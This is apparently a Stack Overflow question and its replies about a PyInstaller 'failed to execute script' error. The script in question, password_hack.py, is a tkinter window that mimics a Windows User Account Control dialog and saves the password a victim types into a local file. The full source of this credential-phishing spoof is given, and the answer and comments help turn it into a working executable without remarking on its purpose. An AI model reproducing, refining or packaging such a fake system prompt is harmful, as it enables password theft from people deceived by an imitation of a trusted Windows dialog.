# Windows- Pyinstaller Error “failed to execute script ”

Tags: python, python-3.x, tkinter, error-handling, pyinstaller

[open this image](https://i.stack.imgur.com/kC7cx.png)

I've searched everywhere, I still can't find the solution

Someone please help me out.

```
pyinstaller password_hack.py
```

pyinstaller command ^

```
def store():
    file = open("password", "w")
    file.write(password.get())
    screen1.destroy()
```

This code could be the problem ^

```
from tkinter import *
from tkinter import messagebox
from tkinter import ttk
from selenium import webdriver
from PIL import ImageTk,Image

def store():
    file = open("password", "w")
    file.write(password.get())
    screen1.destroy()

def wrong_pass():
    global screen1
    screen1 = Tk()
    screen1.title("                                           User Account Control")
    screen1.geometry("460x339+800+300")
    screen1.config(bg="#F0F0F0")

    global password
    password = StringVar()

    my_img = ImageTk.PhotoImage(Image.open("admin_pass1.png"))
    my_label = Label(screen1, image=my_img)
    my_label.pack()
    Label(screen1, text="Muhammed Falah", bg="#CBE8F6", font=("Verdana", 11)).place(relx=0.22, rely=0.57)
    Label(screen1, text="LAPTOP-8LB07TBQ", bg="#CBE8F6", font=("Verdana", 10)).place(relx=0.22, rely=0.64)
    pass_entry = Entry(screen1, bd=1.4, width=32, textvariable=password, show="●")
    pass_entry.place(relx=0.22, rely=0.73)
    ttk.Button(screen1, text="Yes", command=store).place(relx=0.6, rely=0.90)
    ttk.Button(screen1, text="No", command=exit).place(relx=0.8, rely=0.90)

    screen1.mainloop()


wrong_pass()
```

Comment: What is the problem?

Comment: @forgetso I get this error `Pyinstaller Error failed to execute script` when I convert .py file to .exe

Answer (score 0):

reasons for `Pyinstaller Error: "failed to execute script"`:

1. files used by the executable are not in the same directory

   - make sure that everything is `in place`.
   - make sure that the `paths` in your program are `valid` and they `exist`.
2. the script is raising error

   - check for any errors in the script.
   - go back to `1`.

Comment: All the files are in the same directory. I don't find any error when I run the program.

Comment: @falahmanalodi In accordance to the image that you have added, all your files are in the same directory as the script (which doesn't matter) but you will need to have those in the same directory as the exe as well

Comment: @AST I added the image to the dist/password_hack and then when I executed the program a cmd terminal opened and closed. I added `input()` at the end of the script but it still didn't work.

Comment: @falahmanalodi In your code I can see that the files are in the root directory, not in a folder `password_hack`, I hope you have updated that as well. Also, could you update your question with the `pyinstaller` command used by you to create the exe.

Comment: @AST `pyinstaller password_hack.py`